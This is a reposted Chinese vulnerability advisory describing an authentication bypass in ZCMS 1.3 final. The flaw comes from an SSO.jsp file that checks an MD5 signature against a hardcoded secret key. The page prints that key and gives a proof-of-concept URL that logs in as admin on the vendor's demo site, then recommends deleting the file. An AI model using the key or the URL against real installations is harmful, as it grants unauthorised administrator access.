网站地图    收藏   

主页 > 后端 > 网站安全 >

ZCMS 1.3 final后台验证绕过漏洞及修复方案 - 网站安

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 简要描述:SSO.jsp文件逻辑错误详细说明:SSO.jsp文件逻辑错误%String username = request.getParameter(u);String time = request.getParameter(t);String str = request.getParameter(s);Stri......

简要描述:
SSO.jsp
文件逻辑错误
详细说明:
SSO.jsp文件逻辑错误
<%

 String username = request.getParameter("u");

 String time = request.getParameter("t");

 String str = request.getParameter("s");

 String key = "WIU%&*DJAJKL%^*W(DLJIST";

        String s = StringUtil.md5Hex(username + time + key);

 if (s.equals(str)) {

  Login.ssoLogin(request, response, username);

 }

%>
漏洞证明:
http://www.zving.com/demo/SSO.jsp?u=admin&t=1&s=ff1168b33fe9e33841bb9814c58a098d
修复方案:
删除漏洞文件

漏洞作者:  tnt1200

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论